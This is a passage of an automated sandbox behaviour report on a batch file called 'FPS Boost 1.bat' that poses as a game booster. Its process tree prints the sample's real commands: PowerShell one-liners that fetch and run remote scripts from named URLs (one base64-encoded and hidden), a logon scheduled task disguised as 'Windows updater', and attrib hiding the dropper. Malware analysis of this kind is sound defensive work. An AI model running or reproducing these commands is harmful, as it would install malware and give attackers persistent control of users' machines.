Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Paul" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Discrete;Continuous" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "MS-1031-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Julie" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "French Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "5223743" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech SW Voice Activation - Japanese (Japan)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Speech HW Voice Activation - English (United States)" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\it-IT\\VoiceActivation_it-IT.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\r1040sr.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Elsa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Microsoft Ichiro - Japanese (Japan)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "40C" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR es-ES Lts Lexicon" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3756129449-3121373848-4276368241-1000\{3F6A4ABE-0B40-43F3-B9AC-04BE5E64351A} explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "SR en-US Locale Handler" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\MSTTSLocjaJP.dat" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = 49553b76dbc112bcd96e2ce32f82aa3750d88abb05779f5fac65e84c5363077e SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "Anywhere;Trailing" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; computer=NativeSupported; address=NativeSupported; currency=NativeSupported; message=NativeSupported; media=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "C0A" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "5233694" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\tn1033.bin" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Cosimo" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "既定の音声として%1を選びました" SearchApp.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 3360 powershell.exe 3360 powershell.exe 4172 powershell.exe 4172 powershell.exe 4172 powershell.exe 1088 powershell.exe 1088 powershell.exe 3620 powershell.exe 3620 powershell.exe 2344 powershell.exe 2344 powershell.exe 2344 powershell.exe 208 powershell.exe 208 powershell.exe 2424 powershell.exe 2424 powershell.exe 828 powershell.exe 828 powershell.exe 3476 powershell.exe 3476 powershell.exe 4560 powershell.exe 4560 powershell.exe 4732 powershell.exe 4732 powershell.exe 3572 powershell.exe 3572 powershell.exe 1276 powershell.exe 1276 powershell.exe 2196 powershell.exe 2196 powershell.exe 4256 powershell.exe 4256 powershell.exe 3604 powershell.exe 3604 powershell.exe 688 powershell.exe 688 powershell.exe 400 powershell.exe 400 powershell.exe 2928 powershell.exe 2928 powershell.exe 100 powershell.exe 100 powershell.exe 1848 powershell.exe 1848 powershell.exe 2588 powershell.exe 2588 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5108 7zFM.exe 4436 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 5108 7zFM.exe Token: 35 5108 7zFM.exe Token: SeSecurityPrivilege 5108 7zFM.exe Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeIncreaseQuotaPrivilege 4392 WMIC.exe Token: SeSecurityPrivilege 4392 WMIC.exe Token: SeTakeOwnershipPrivilege 4392 WMIC.exe Token: SeLoadDriverPrivilege 4392 WMIC.exe Token: SeSystemProfilePrivilege 4392 WMIC.exe Token: SeSystemtimePrivilege 4392 WMIC.exe Token: SeProfSingleProcessPrivilege 4392 WMIC.exe Token: SeIncBasePriorityPrivilege 4392 WMIC.exe Token: SeCreatePagefilePrivilege 4392 WMIC.exe Token: SeBackupPrivilege 4392 WMIC.exe Token: SeRestorePrivilege 4392 WMIC.exe Token: SeShutdownPrivilege 4392 WMIC.exe Token: SeDebugPrivilege 4392 WMIC.exe Token: SeSystemEnvironmentPrivilege 4392 WMIC.exe Token: SeRemoteShutdownPrivilege 4392 WMIC.exe Token: SeUndockPrivilege 4392 WMIC.exe Token: SeManageVolumePrivilege 4392 WMIC.exe Token: 33 4392 WMIC.exe Token: 34 4392 WMIC.exe Token: 35 4392 WMIC.exe Token: 36 4392 WMIC.exe Token: SeIncreaseQuotaPrivilege 4392 WMIC.exe Token: SeSecurityPrivilege 4392 WMIC.exe Token: SeTakeOwnershipPrivilege 4392 WMIC.exe Token: SeLoadDriverPrivilege 4392 WMIC.exe Token: SeSystemProfilePrivilege 4392 WMIC.exe Token: SeSystemtimePrivilege 4392 WMIC.exe Token: SeProfSingleProcessPrivilege 4392 WMIC.exe Token: SeIncBasePriorityPrivilege 4392 WMIC.exe Token: SeCreatePagefilePrivilege 4392 WMIC.exe Token: SeBackupPrivilege 4392 WMIC.exe Token: SeRestorePrivilege 4392 WMIC.exe Token: SeShutdownPrivilege 4392 WMIC.exe Token: SeDebugPrivilege 4392 WMIC.exe Token: SeSystemEnvironmentPrivilege 4392 WMIC.exe Token: SeRemoteShutdownPrivilege 4392 WMIC.exe Token: SeUndockPrivilege 4392 WMIC.exe Token: SeManageVolumePrivilege 4392 WMIC.exe Token: 33 4392 WMIC.exe Token: 34 4392 WMIC.exe Token: 35 4392 WMIC.exe Token: 36 4392 WMIC.exe Token: SeIncreaseQuotaPrivilege 4560 WMIC.exe Token: SeSecurityPrivilege 4560 WMIC.exe Token: SeTakeOwnershipPrivilege 4560 WMIC.exe Token: SeLoadDriverPrivilege 4560 WMIC.exe Token: SeSystemProfilePrivilege 4560 WMIC.exe Token: SeSystemtimePrivilege 4560 WMIC.exe Token: SeProfSingleProcessPrivilege 4560 WMIC.exe Token: SeIncBasePriorityPrivilege 4560 WMIC.exe Token: SeCreatePagefilePrivilege 4560 WMIC.exe Token: SeBackupPrivilege 4560 WMIC.exe Token: SeRestorePrivilege 4560 WMIC.exe Token: SeShutdownPrivilege 4560 WMIC.exe Token: SeDebugPrivilege 4560 WMIC.exe Token: SeSystemEnvironmentPrivilege 4560 WMIC.exe Token: SeRemoteShutdownPrivilege 4560 WMIC.exe Token: SeUndockPrivilege 4560 WMIC.exe Token: SeManageVolumePrivilege 4560 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5108 7zFM.exe 5108 7zFM.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 3228 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 1464 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe 4416 explorer.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3488 StartMenuExperienceHost.exe 1248 StartMenuExperienceHost.exe 4796 SearchApp.exe 3660 StartMenuExperienceHost.exe 4700 SearchApp.exe 4392 StartMenuExperienceHost.exe 2468 SearchApp.exe 3368 StartMenuExperienceHost.exe 2648 SearchApp.exe 2880 StartMenuExperienceHost.exe 3792 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 968 wrote to memory of 1376 968 cmd.exe 100 PID 968 wrote to memory of 1376 968 cmd.exe 100 PID 968 wrote to memory of 4896 968 cmd.exe 101 PID 968 wrote to memory of 4896 968 cmd.exe 101 PID 968 wrote to memory of 3360 968 cmd.exe 102 PID 968 wrote to memory of 3360 968 cmd.exe 102 PID 3360 wrote to memory of 4056 3360 powershell.exe 103 PID 3360 wrote to memory of 4056 3360 powershell.exe 103 PID 4056 wrote to memory of 400 4056 cmd.exe 105 PID 4056 wrote to memory of 400 4056 cmd.exe 105 PID 968 wrote to memory of 1484 968 cmd.exe 106 PID 968 wrote to memory of 1484 968 cmd.exe 106 PID 968 wrote to memory of 2376 968 cmd.exe 107 PID 968 wrote to memory of 2376 968 cmd.exe 107 PID 968 wrote to memory of 3084 968 cmd.exe 108 PID 968 wrote to memory of 3084 968 cmd.exe 108 PID 968 wrote to memory of 4900 968 cmd.exe 109 PID 968 wrote to memory of 4900 968 cmd.exe 109 PID 968 wrote to memory of 4416 968 cmd.exe 110 PID 968 wrote to memory of 4416 968 cmd.exe 110 PID 968 wrote to memory of 1516 968 cmd.exe 111 PID 968 wrote to memory of 1516 968 cmd.exe 111 PID 968 wrote to memory of 4692 968 cmd.exe 112 PID 968 wrote to memory of 4692 968 cmd.exe 112 PID 968 wrote to memory of 4024 968 cmd.exe 113 PID 968 wrote to memory of 4024 968 cmd.exe 113 PID 968 wrote to memory of 1472 968 cmd.exe 114 PID 968 wrote to memory of 1472 968 cmd.exe 114 PID 968 wrote to memory of 4996 968 cmd.exe 115 PID 968 wrote to memory of 4996 968 cmd.exe 115 PID 968 wrote to memory of 4780 968 cmd.exe 116 PID 968 wrote to memory of 4780 968 cmd.exe 116 PID 968 wrote to memory of 512 968 cmd.exe 117 PID 968 wrote to memory of 512 968 cmd.exe 117 PID 968 wrote to memory of 4392 968 cmd.exe 118 PID 968 wrote to memory of 4392 968 cmd.exe 118 PID 4056 wrote to memory of 1724 4056 cmd.exe 119 PID 4056 wrote to memory of 1724 4056 cmd.exe 119 PID 4056 wrote to memory of 4504 4056 cmd.exe 120 PID 4056 wrote to memory of 4504 4056 cmd.exe 120 PID 4056 wrote to memory of 4172 4056 cmd.exe 121 PID 4056 wrote to memory of 4172 4056 cmd.exe 121 PID 968 wrote to memory of 2680 968 cmd.exe 124 PID 968 wrote to memory of 2680 968 cmd.exe 124 PID 968 wrote to memory of 1848 968 cmd.exe 125 PID 968 wrote to memory of 1848 968 cmd.exe 125 PID 968 wrote to memory of 4184 968 cmd.exe 126 PID 968 wrote to memory of 4184 968 cmd.exe 126 PID 968 wrote to memory of 1276 968 cmd.exe 127 PID 968 wrote to memory of 1276 968 cmd.exe 127 PID 968 wrote to memory of 4192 968 cmd.exe 128 PID 968 wrote to memory of 4192 968 cmd.exe 128 PID 968 wrote to memory of 4896 968 cmd.exe 129 PID 968 wrote to memory of 4896 968 cmd.exe 129 PID 968 wrote to memory of 3088 968 cmd.exe 131 PID 968 wrote to memory of 3088 968 cmd.exe 131 PID 968 wrote to memory of 872 968 cmd.exe 132 PID 968 wrote to memory of 872 968 cmd.exe 132 PID 968 wrote to memory of 2196 968 cmd.exe 133 PID 968 wrote to memory of 2196 968 cmd.exe 133 PID 968 wrote to memory of 2208 968 cmd.exe 134 PID 968 wrote to memory of 2208 968 cmd.exe 134 PID 968 wrote to memory of 4204 968 cmd.exe 135 PID 968 wrote to memory of 4204 968 cmd.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4504 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FPS Boost 1.bat.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\FPS Boost 1.bat"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\mode.commode 128,332⤵PID:1376
-
-
C:\Windows\System32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"2⤵PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\dwn.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\System32\timeout.exetimeout /t 1 /nobreak4⤵
- Delays execution with timeout.exe
PID:400
-
-
C:\Windows\System32\schtasks.exeschtasks /create /tn "Windows updater" /tr "C:\Users\Public\dwn.bat" /sc ONLOGON /ru Admin /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1724
-
-
C:\Windows\System32\attrib.exeattrib +h "C:\Users\Public\dwn.bat"4⤵
- Views/modifies file attributes
PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"4⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"2⤵PID:1484
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:2376
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:3084
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4900
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:4416
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:1516
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:4692
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4024
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:1472
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:4996
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4780
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:512
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:4392
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " Version 2.0 " nul2⤵PID:2680
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul2⤵PID:1848
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4184
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 1 " nul2⤵PID:1276
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4192
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Cleaner " nul2⤵PID:4896
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:3088
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 2 " nul2⤵PID:872
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:2196
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Game Booster " nul2⤵PID:2208
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:4204
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 3 " nul2⤵PID:4520
-
-
C:\Windows\System32\findstr.exefindstr /v /a:B /R "^$" " 7 " nul2⤵PID:4336
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " ] " nul2⤵PID:4592
-
-
C:\Windows\System32\findstr.exefindstr /v /a:F /R "^$" " Debloat " nul2⤵PID:3276
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ X to go Back ]" nul2⤵PID:4424
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name="javaw.exe" CALL setpriority "realtime"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
C:\Windows\System32\Wbem\WMIC.exewmic process where name="svchost.exe" CALL setpriority "realtime"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " Version 2.0 " nul2⤵PID:3012
-
-
C:\Windows\System32\findstr.exefindstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul2⤵PID:2928
-
-
C:\Windows\System32\findstr.exefindstr /v /a:8 /R "^$" " [ " nul2⤵PID:1632
-
-
